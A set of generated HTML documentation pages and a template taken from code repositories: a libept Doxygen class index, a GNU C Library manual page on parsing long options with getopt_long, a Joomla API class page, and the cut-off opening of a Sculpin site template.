<tr id="row_11_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structMain.html" target="_self">Main</a></td><td class="desc"></td></tr>
<tr id="row_12_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1debtags_1_1Path_1_1OverrideDebtagsIndexDir.html" target="_self">ept::debtags::Path::OverrideDebtagsIndexDir</a></td><td class="desc"></td></tr>
<tr id="row_13_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1debtags_1_1Path_1_1OverrideDebtagsSourceDir.html" target="_self">ept::debtags::Path::OverrideDebtagsSourceDir</a></td><td class="desc"></td></tr>
<tr id="row_14_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1debtags_1_1Path_1_1OverrideDebtagsUserIndexDir.html" target="_self">ept::debtags::Path::OverrideDebtagsUserIndexDir</a></td><td class="desc"></td></tr>
<tr id="row_15_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1debtags_1_1Path_1_1OverrideDebtagsUserSourceDir.html" target="_self">ept::debtags::Path::OverrideDebtagsUserSourceDir</a></td><td class="desc"></td></tr>
<tr id="row_16_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1axi_1_1OverrideIndexDir.html" target="_self">ept::axi::OverrideIndexDir</a></td><td class="desc">RAII temporary override of the location of the index root directory, used for tests</td></tr>
<tr id="row_17_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1popcon_1_1Path_1_1OverridePopconIndexDir.html" target="_self">ept::popcon::Path::OverridePopconIndexDir</a></td><td class="desc"></td></tr>
<tr id="row_18_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1popcon_1_1Path_1_1OverridePopconSourceDir.html" target="_self">ept::popcon::Path::OverridePopconSourceDir</a></td><td class="desc"></td></tr>
<tr id="row_19_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1popcon_1_1Path_1_1OverridePopconUserIndexDir.html" target="_self">ept::popcon::Path::OverridePopconUserIndexDir</a></td><td class="desc"></td></tr>
<tr id="row_20_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1popcon_1_1Path_1_1OverridePopconUserSourceDir.html" target="_self">ept::popcon::Path::OverridePopconUserSourceDir</a></td><td class="desc"></td></tr>
<tr id="row_21_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structept_1_1apt_1_1PackageState.html" target="_self">ept::apt::PackageState</a></td><td class="desc"></td></tr>
<tr id="row_22_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1popcon_1_1Path.html" target="_self">ept::popcon::Path</a></td><td class="desc">Singleton class to configure and access the various <a class="el" href="classept_1_1popcon_1_1Popcon.html" title="Maps Packages to IDs and vice-versa.">Popcon</a> paths</td></tr>
<tr id="row_23_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1debtags_1_1Path.html" target="_self">ept::debtags::Path</a></td><td class="desc">Singleton class to configure and access the various <a class="el" href="classept_1_1debtags_1_1Debtags.html" title="Access the on-disk Debtags tag database.">Debtags</a> paths</td></tr>
<tr id="row_24_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1popcon_1_1Popcon.html" target="_self">ept::popcon::Popcon</a></td><td class="desc">Maps Packages to IDs and vice-versa</td></tr>
<tr id="row_25_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structept_1_1popcon_1_1PopconIndexer.html" target="_self">ept::popcon::PopconIndexer</a></td><td class="desc"></td></tr>
<tr id="row_26_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1ProgressCallback.html" target="_self">ept::ProgressCallback</a></td><td class="desc"></td></tr>
<tr id="row_27_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1apt_1_1Apt_1_1RecordIterator.html" target="_self">ept::apt::Apt::RecordIterator</a></td><td class="desc"></td></tr>
<tr id="row_28_" class="even"><td class="entry"><img id="arr_28_" src="ftv2mnode.png" alt="o" width="16" height="22" onclick="toggleFolder('28_')"/><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1apt_1_1RecordParser.html" target="_self">ept::apt::RecordParser</a></td><td class="desc">Access the fields of a package record contained inside a std::string</td></tr>
<tr id="row_28_0_"><td class="entry"><img src="ftv2vertline.png" alt="|" width="16" height="22" /><img src="ftv2lastnode.png" alt="\" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1apt_1_1PackageRecord.html" target="_self">ept::apt::PackageRecord</a></td><td class="desc"><a class="el" href="classept_1_1apt_1_1RecordParser.html" title="Access the fields of a package record contained inside a std::string.">RecordParser</a> specialised with access methods for common Debian package information</td></tr>
<tr id="row_29_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structRunAll.html" target="_self">RunAll</a></td><td class="desc"></td></tr>
<tr id="row_30_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structRunSuite.html" target="_self">RunSuite</a></td><td class="desc"></td></tr>
<tr id="row_31_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structRunTest.html" target="_self">RunTest</a></td><td class="desc"></td></tr>
<tr id="row_32_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1popcon_1_1Score.html" target="_self">ept::popcon::Score</a></td><td class="desc">Store the score information in the popcon cache</td></tr>
<tr id="row_33_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1debtags_1_1SourceDir.html" target="_self">ept::debtags::SourceDir</a></td><td class="desc">Access a directory containing <a class="el" href="classept_1_1debtags_1_1Debtags.html" title="Access the on-disk Debtags tag database.">Debtags</a> data files</td></tr>
<tr id="row_34_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1popcon_1_1SourceDir.html" target="_self">ept::popcon::SourceDir</a></td><td class="desc">Access a directory containing Debtags data files</td></tr>
<tr id="row_35_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structept_1_1Sources.html" target="_self">ept::Sources</a></td><td class="desc"></td></tr>
<tr id="row_36_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1debtags_1_1TagToFacet.html" target="_self">ept::debtags::TagToFacet< OUT ></a></td><td class="desc">Convert a collection of ITEMs tagged with Tags to a collection of ITEMs tagged with only the facets</td></tr>
<tr id="row_37_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structTestAptPackagerecord.html" target="_self">TestAptPackagerecord</a></td><td class="desc"></td></tr>
<tr id="row_38_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structTestAptRecordparser.html" target="_self">TestAptRecordparser</a></td><td class="desc"></td></tr>
<tr id="row_39_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structTestAptVersion.html" target="_self">TestAptVersion</a></td><td class="desc"></td></tr>
<tr id="row_40_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structTestPopcon.html" target="_self">TestPopcon</a></td><td class="desc"></td></tr>
<tr id="row_41_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structTestPopconLocal.html" target="_self">TestPopconLocal</a></td><td class="desc"></td></tr>
<tr id="row_42_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structept_1_1Token.html" target="_self">ept::Token</a></td><td class="desc"></td></tr>
<tr id="row_43_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1apt_1_1Version.html" target="_self">ept::apt::Version</a></td><td class="desc">Lightweight <a class="el" href="classept_1_1apt_1_1Version.html" title="Lightweight Version class that represent a package with a version, with very cheap value copy operati...">Version</a> class that represent a package with a version, with very cheap value copy operations</td></tr>
<tr id="row_44_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1debtags_1_1Vocabulary.html" target="_self">ept::debtags::Vocabulary</a></td><td class="desc"></td></tr>
<tr id="row_45_" class="even"><td class="entry"><img src="ftv2lastnode.png" alt="\" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structept_1_1Sources_1_1Entry_1_1Word.html" target="_self">ept::Sources::Entry::Word</a></td><td class="desc"></td></tr>
</table>
</div><!-- directory -->
</div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Mon Jul 2 2012 08:42:15 for libept by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.1.1
</small></address>
</body>
</html>
|
share/doc/gcc-linaro-arm-linux-gnueabihf/html/libc/Getopt-Long-Options.html | eckucukoglu/arm-linux-gnueabihf | <html lang="en">
<head>
<title>Getopt Long Options - The GNU C Library</title>
<meta http-equiv="Content-Type" content="text/html">
<meta name="description" content="The GNU C Library">
<meta name="generator" content="makeinfo 4.13">
<link title="Top" rel="start" href="index.html#Top">
<link rel="up" href="Getopt.html#Getopt" title="Getopt">
<link rel="prev" href="Example-of-Getopt.html#Example-of-Getopt" title="Example of Getopt">
<link rel="next" href="Getopt-Long-Option-Example.html#Getopt-Long-Option-Example" title="Getopt Long Option Example">
<link href="http://www.gnu.org/software/texinfo/" rel="generator-home" title="Texinfo Homepage">
<!--
This file documents the GNU C Library.
This is
`The GNU C Library Reference Manual', for version
2.19-2014.08 (crosstool-NG linaro-1.13.1-4.9-2014.09 - Linaro GCC 4.9-2014.09).
Copyright (C) 1993--2014 Free Software Foundation, Inc.
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version
1.3 or any later version published by the Free
Software Foundation; with the Invariant Sections being ``Free Software
Needs Free Documentation'' and ``GNU Lesser General Public License'',
the Front-Cover texts being ``A GNU Manual'', and with the Back-Cover
Texts as in (a) below. A copy of the license is included in the
section entitled "GNU Free Documentation License".
(a) The FSF's Back-Cover Text is: ``You have the freedom to
copy and modify this GNU manual. Buying copies from the FSF
supports it in developing GNU and promoting software freedom.''-->
<meta http-equiv="Content-Style-Type" content="text/css">
<style type="text/css"><!--
pre.display { font-family:inherit }
pre.format { font-family:inherit }
pre.smalldisplay { font-family:inherit; font-size:smaller }
pre.smallformat { font-family:inherit; font-size:smaller }
pre.smallexample { font-size:smaller }
pre.smalllisp { font-size:smaller }
span.sc { font-variant:small-caps }
span.roman { font-family:serif; font-weight:normal; }
span.sansserif { font-family:sans-serif; font-weight:normal; }
--></style>
</head>
<body>
<div class="node">
<a name="Getopt-Long-Options"></a>
<p>
Next: <a rel="next" accesskey="n" href="Getopt-Long-Option-Example.html#Getopt-Long-Option-Example">Getopt Long Option Example</a>,
Previous: <a rel="previous" accesskey="p" href="Example-of-Getopt.html#Example-of-Getopt">Example of Getopt</a>,
Up: <a rel="up" accesskey="u" href="Getopt.html#Getopt">Getopt</a>
<hr>
</div>
<h4 class="subsection">25.2.3 Parsing Long Options with <code>getopt_long</code></h4>
<p>To accept GNU-style long options as well as single-character options,
use <code>getopt_long</code> instead of <code>getopt</code>. This function is
declared in <samp><span class="file">getopt.h</span></samp>, not <samp><span class="file">unistd.h</span></samp>. You should make every
program accept long options if it uses any options, for this takes
little extra work and helps beginners remember how to use the program.
<!-- getopt.h -->
<!-- GNU -->
<div class="defun">
— Data Type: <b>struct option</b><var><a name="index-struct-option-3071"></a></var><br>
<blockquote><p>This structure describes a single long option name for the sake of
<code>getopt_long</code>. The argument <var>longopts</var> must be an array of
these structures, one for each long option. Terminate the array with an
element containing all zeros.
<p>The <code>struct option</code> structure has these fields:
<dl>
<dt><code>const char *name</code><dd>This field is the name of the option. It is a string.
<br><dt><code>int has_arg</code><dd>This field says whether the option takes an argument. It is an integer,
and there are three legitimate values: <code>no_argument</code><!-- /@w -->,
<code>required_argument</code> and <code>optional_argument</code>.
<br><dt><code>int *flag</code><dt><code>int val</code><dd>These fields control how to report or act on the option when it occurs.
<p>If <code>flag</code> is a null pointer, then the <code>val</code> is a value which
identifies this option. Often these values are chosen to uniquely
identify particular long options.
<p>If <code>flag</code> is not a null pointer, it should be the address of an
<code>int</code> variable which is the flag for this option. The value in
<code>val</code> is the value to store in the flag to indicate that the option
was seen.
</dl>
</p></blockquote></div>
<!-- getopt.h -->
<!-- GNU -->
<div class="defun">
— Function: int <b>getopt_long</b> (<var>int argc, char *const *argv, const char *shortopts, const struct option *longopts, int *indexptr</var>)<var><a name="index-getopt_005flong-3072"></a></var><br>
<blockquote><p>Preliminary:
| MT-Unsafe race:getopt env
| AS-Unsafe heap i18n lock corrupt
| AC-Unsafe mem lock corrupt
| See <a href="POSIX-Safety-Concepts.html#POSIX-Safety-Concepts">POSIX Safety Concepts</a>.
<!-- Same issues as getopt. -->
<p>Decode options from the vector <var>argv</var> (whose length is <var>argc</var>).
The argument <var>shortopts</var> describes the short options to accept, just as
it does in <code>getopt</code>. The argument <var>longopts</var> describes the long
options to accept (see above).
<p>When <code>getopt_long</code> encounters a short option, it does the same
thing that <code>getopt</code> would do: it returns the character code for the
option, and stores the options argument (if it has one) in <code>optarg</code>.
<p>When <code>getopt_long</code> encounters a long option, it takes actions based
on the <code>flag</code> and <code>val</code> fields of the definition of that
option.
<p>If <code>flag</code> is a null pointer, then <code>getopt_long</code> returns the
contents of <code>val</code> to indicate which option it found. You should
arrange distinct values in the <code>val</code> field for options with
different meanings, so you can decode these values after
<code>getopt_long</code> returns. If the long option is equivalent to a short
option, you can use the short option's character code in <code>val</code>.
<p>If <code>flag</code> is not a null pointer, that means this option should just
set a flag in the program. The flag is a variable of type <code>int</code>
that you define. Put the address of the flag in the <code>flag</code> field.
Put in the <code>val</code> field the value you would like this option to
store in the flag. In this case, <code>getopt_long</code> returns <code>0</code>.
<p>For any long option, <code>getopt_long</code> tells you the index in the array
<var>longopts</var> of the options definition, by storing it into
<code>*</code><var>indexptr</var>. You can get the name of the option with
<var>longopts</var><code>[*</code><var>indexptr</var><code>].name</code>. So you can distinguish among
long options either by the values in their <code>val</code> fields or by their
indices. You can also distinguish in this way among long options that
set flags.
<p>When a long option has an argument, <code>getopt_long</code> puts the argument
value in the variable <code>optarg</code> before returning. When the option
has no argument, the value in <code>optarg</code> is a null pointer. This is
how you can tell whether an optional argument was supplied.
<p>When <code>getopt_long</code> has no more options to handle, it returns
<code>-1</code>, and leaves in the variable <code>optind</code> the index in
<var>argv</var> of the next remaining argument.
</p></blockquote></div>
<p>Since long option names were used before the <code>getopt_long</code>
options was invented there are program interfaces which require programs
to recognize options like ‘<samp><span class="samp">-option value</span></samp>’<!-- /@w --> instead of
‘<samp><span class="samp">--option value</span></samp>’<!-- /@w -->. To enable these programs to use the GNU
getopt functionality there is one more function available.
<!-- getopt.h -->
<!-- GNU -->
<div class="defun">
— Function: int <b>getopt_long_only</b> (<var>int argc, char *const *argv, const char *shortopts, const struct option *longopts, int *indexptr</var>)<var><a name="index-getopt_005flong_005fonly-3073"></a></var><br>
<blockquote><p>Preliminary:
| MT-Unsafe race:getopt env
| AS-Unsafe heap i18n lock corrupt
| AC-Unsafe mem lock corrupt
| See <a href="POSIX-Safety-Concepts.html#POSIX-Safety-Concepts">POSIX Safety Concepts</a>.
<!-- Same issues as getopt. -->
<p>The <code>getopt_long_only</code> function is equivalent to the
<code>getopt_long</code> function but it allows to specify the user of the
application to pass long options with only ‘<samp><span class="samp">-</span></samp>’ instead of
‘<samp><span class="samp">--</span></samp>’. The ‘<samp><span class="samp">--</span></samp>’ prefix is still recognized but instead of
looking through the short options if a ‘<samp><span class="samp">-</span></samp>’ is seen it is first
tried whether this parameter names a long option. If not, it is parsed
as a short option.
<p>Assuming <code>getopt_long_only</code> is used starting an application with
<pre class="smallexample"> app -foo
</pre>
<p class="noindent">the <code>getopt_long_only</code> will first look for a long option named
‘<samp><span class="samp">foo</span></samp>’. If this is not found, the short options ‘<samp><span class="samp">f</span></samp>’, ‘<samp><span class="samp">o</span></samp>’,
and again ‘<samp><span class="samp">o</span></samp>’ are recognized.
</p></blockquote></div>
</body></html>
|
Joomla-Installation/View/InstallationViewDefaultlanguageHtml.html | asika32764/Joomla-CMS-API-Document | <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- template designed by Marco Von Ballmoos -->
<title>Docs For Class InstallationViewDefaultlanguageHtml</title>
<link rel="stylesheet" href="../../media/stylesheet.css" />
<script src="../../media/lib/classTree.js"></script>
<script language="javascript" type="text/javascript">
var imgPlus = new Image();
var imgMinus = new Image();
imgPlus.src = "../../media/images/plus.png";
imgMinus.src = "../../media/images/minus.png";
function showNode(Node){
switch(navigator.family){
case 'nn4':
// Nav 4.x code fork...
var oTable = document.layers["span" + Node];
var oImg = document.layers["img" + Node];
break;
case 'ie4':
// IE 4/5 code fork...
var oTable = document.all["span" + Node];
var oImg = document.all["img" + Node];
break;
case 'gecko':
// Standards Compliant code fork...
var oTable = document.getElementById("span" + Node);
var oImg = document.getElementById("img" + Node);
break;
}
oImg.src = imgMinus.src;
oTable.style.display = "block";
}
function hideNode(Node){
switch(navigator.family){
case 'nn4':
// Nav 4.x code fork...
var oTable = document.layers["span" + Node];
var oImg = document.layers["img" + Node];
break;
case 'ie4':
// IE 4/5 code fork...
var oTable = document.all["span" + Node];
var oImg = document.all["img" + Node];
break;
case 'gecko':
// Standards Compliant code fork...
var oTable = document.getElementById("span" + Node);
var oImg = document.getElementById("img" + Node);
break;
}
oImg.src = imgPlus.src;
oTable.style.display = "none";
}
function nodeIsVisible(Node){
switch(navigator.family){
case 'nn4':
// Nav 4.x code fork...
var oTable = document.layers["span" + Node];
break;
case 'ie4':
// IE 4/5 code fork...
var oTable = document.all["span" + Node];
break;
case 'gecko':
// Standards Compliant code fork...
var oTable = document.getElementById("span" + Node);
break;
}
return (oTable && oTable.style.display == "block");
}
function toggleNodeVisibility(Node){
if (nodeIsVisible(Node)){
hideNode(Node);
}else{
showNode(Node);
}
}
</script>
</head>
<body>
<div class="page-body">
<h2 class="class-name"><img src="../../media/images/Class_logo.png"
alt=" Class"
title=" Class"
style="vertical-align: middle"> InstallationViewDefaultlanguageHtml</h2>
<a name="sec-description"></a>
<div class="info-box">
<div class="info-box-title">Description</div>
<div class="nav-bar">
<span class="disabled">Description</span> |
<a href="#sec-var-summary">Vars</a> (<a href="#sec-vars">details</a>)
| <a href="#sec-method-summary">Methods</a> (<a href="#sec-methods">details</a>)
</div>
<div class="info-box-body">
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">The Installation Default Language View</p>
<ul class="tags">
<li><span class="field">since:</span> 3.1</li>
</ul>
<p class="notes">
Located in <a class="field" href="_installation---view---defaultlanguage---html.php.html">/installation/view/defaultlanguage/html.php</a> (line <span class="field"><a href="../../filesource/fsource_Joomla-Installation_View_installationviewdefaultlanguagehtml.php.html#a20">20</a></span>)
</p>
<pre><a href="../../Joomla-Platform/View/JViewBase.html">JViewBase</a>
|
--<a href="../../Joomla-Platform/View/JViewHtml.html">JViewHtml</a>
|
--InstallationViewDefaultlanguageHtml</pre>
</div>
</div>
<a name="sec-var-summary"></a>
<div class="info-box">
<div class="info-box-title">Variable Summary</span></div>
<div class="nav-bar">
<a href="#sec-description">Description</a> |
<span class="disabled">Vars</span> (<a href="#sec-vars">details</a>)
|
<a href="#sec-method-summary">Methods</a> (<a href="#sec-methods">details</a>)
</div>
<div class="info-box-body">
<div class="var-summary">
<div class="var-title">
<img src="../../media/images/Variable.png" alt=" " />
<span class="var-type">array</span>
<a href="#$items" title="details" class="var-name">$items</a>
</div>
<div class="var-title">
<img src="../../media/images/Variable.png" alt=" " />
<span class="var-type"><a href="../../Joomla-Installation/Model/InstallationModelLanguages.html">InstallationModelLanguages</a></span>
<a href="#$model" title="details" class="var-name">$model</a>
</div>
</div>
</div>
</div>
<a name="sec-method-summary"></a>
<div class="info-box">
<div class="info-box-title">Method Summary</span></div>
<div class="nav-bar">
<a href="#sec-description">Description</a> |
<a href="#sec-var-summary">Vars</a> (<a href="#sec-vars">details</a>)
|
<span class="disabled">Methods</span> (<a href="#sec-methods">details</a>)
</div>
<div class="info-box-body">
<div class="method-summary">
<div class="method-definition">
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-result">string</span>
<a href="#render" title="details" class="method-name">render</a>
()
</div>
</div>
</div>
</div>
<a name="sec-vars"></a>
<div class="info-box">
<div class="info-box-title">Variables</div>
<div class="nav-bar">
<a href="#sec-description">Description</a> |
<a href="#sec-var-summary">Vars</a> (<span class="disabled">details</span>)
|
<a href="#sec-method-summary">Methods</a> (<a href="#sec-methods">details</a>)
</div>
<div class="info-box-body">
<a name="var$items" id="$items"><!-- --></A>
<div class="evenrow">
<div class="var-header">
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-type">array</span>
<span class="var-name">$items</span>
(line <span class="line-number"><a href="../../filesource/fsource_Joomla-Installation_View_installationviewdefaultlanguagehtml.php.html#a28">28</a></span>)
</span>
</div>
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">Container with all installed languages</p>
<ul class="tags">
<li><span class="field">since:</span> 3.1</li>
<li><span class="field">access:</span> public</li>
</ul>
</div>
<a name="var$model" id="$model"><!-- --></A>
<div class="oddrow">
<div class="var-header">
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-type"><a href="../../Joomla-Installation/Model/InstallationModelLanguages.html">InstallationModelLanguages</a></span>
<span class="var-name">$model</span>
(line <span class="line-number"><a href="../../filesource/fsource_Joomla-Installation_View_installationviewdefaultlanguagehtml.php.html#a36">36</a></span>)
</span>
</div>
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">Redefine the model so the correct type hinting is available.</p>
<ul class="tags">
<li><span class="field">since:</span> 3.1</li>
<li><span class="field">access:</span> protected</li>
</ul>
<hr class="separator" />
<div class="notes">Redefinition of:</div>
<dl>
<dt><a href="../../Joomla-Platform/View/JViewBase.html#var$model">JViewBase::$model</a></dt>
<dd>The model object.</dd>
</dl>
</div>
<h4>Inherited Variables</h4>
<A NAME='inherited_vars'><!-- --></A>
<p>Inherited from <span class="classname"><a href="../../Joomla-Platform/View/JViewHtml.html">JViewHtml</a></span></p>
<blockquote>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/View/JViewHtml.html#var$layout">JViewHtml::$layout</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/View/JViewHtml.html#var$paths">JViewHtml::$paths</a></span><br>
</span>
</blockquote>
</div>
</div>
<a name="sec-methods"></a>
<div class="info-box">
<div class="info-box-title">Methods</div>
<div class="nav-bar">
<a href="#sec-description">Description</a> |
<a href="#sec-var-summary">Vars</a> (<a href="#sec-vars">details</a>)
<a href="#sec-method-summary">Methods</a> (<span class="disabled">details</span>)
</div>
<div class="info-box-body">
<A NAME='method_detail'></A>
<a name="methodrender" id="render"><!-- --></a>
<div class="evenrow">
<div class="method-header">
<img src="../../media/images/Method.png" />
<span class="method-title">render</span> (line <span class="line-number"><a href="../../filesource/fsource_Joomla-Installation_View_installationviewdefaultlanguagehtml.php.html#a45">45</a></span>)
</div>
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">Method to render the view.</p>
<ul class="tags">
<li><span class="field">return:</span> The rendered view.</li>
<li><span class="field">since:</span> 3.1</li>
<li><span class="field">access:</span> public</li>
</ul>
<div class="method-signature">
<span class="method-result">string</span>
<span class="method-name">
render
</span>
()
</div>
<hr class="separator" />
<div class="notes">Redefinition of:</div>
<dl>
<dt><a href="../../Joomla-Platform/View/JViewHtml.html#methodrender">JViewHtml::render()</a></dt>
<dd>Method to render the view.</dd>
</dl>
</div>
<h4>Inherited Methods</h4>
<a name='inherited_methods'><!-- --></a>
<!-- =========== Summary =========== -->
<p>Inherited From <span class="classname"><a href="../../Joomla-Platform/View/JViewHtml.html">JViewHtml</a></span></p>
<blockquote>
<img src="../../media/images/Constructor.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/View/JViewHtml.html#method__construct">JViewHtml::__construct()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/View/JViewHtml.html#methodescape">JViewHtml::escape()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/View/JViewHtml.html#methodgetLayout">JViewHtml::getLayout()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/View/JViewHtml.html#methodgetPath">JViewHtml::getPath()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/View/JViewHtml.html#methodgetPaths">JViewHtml::getPaths()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/View/JViewHtml.html#methodloadPaths">JViewHtml::loadPaths()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/View/JViewHtml.html#methodrender">JViewHtml::render()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/View/JViewHtml.html#methodsetLayout">JViewHtml::setLayout()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/View/JViewHtml.html#methodsetPaths">JViewHtml::setPaths()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/View/JViewHtml.html#method__toString">JViewHtml::__toString()</a></span><br>
</blockquote>
<!-- =========== Summary =========== -->
<p>Inherited From <span class="classname"><a href="../../Joomla-Platform/View/JViewBase.html">JViewBase</a></span></p>
<blockquote>
<img src="../../media/images/Constructor.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/View/JViewBase.html#method__construct">JViewBase::__construct()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/View/JViewBase.html#methodescape">JViewBase::escape()</a></span><br>
</blockquote>
</div>
</div>
<p class="notes" id="credit">
Documentation generated on Tue, 19 Nov 2013 15:04:47 +0100 by <a href="http://www.phpdoc.org" target="_blank">phpDocumentor 1.4.3</a>
</p>
</div></body>
</html> |
source/_views/default-pl.html | FoodCoopSystem/foodcoop-sculpin | <!DOCTYPE html>
<html>
<head>
<title>{% block title %}{{ page.title }}{% endblock %} — {{ site.title }} — {{ site.subtitle }}</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="{{ site.url }}/components/bootstrap/css/bootstrap.min.css" rel="stylesheet" type="text/css" />
<link href="{{ site.url }}/components/bootstrap/css/bootstrap-responsive.min.css" rel="stylesheet" type="text/css" />
<link href="{{ site.url }}/css/style.css" rel="stylesheet" type="text/css" />
<link rel="stylesheet" type="text/css" href="//cloud.typography.com/8000672/785866/css/fonts.css" />
<!-- HTML5 shim, for IE6-8 support of HTML5 elements -->
<!--[if lt IE 9]>
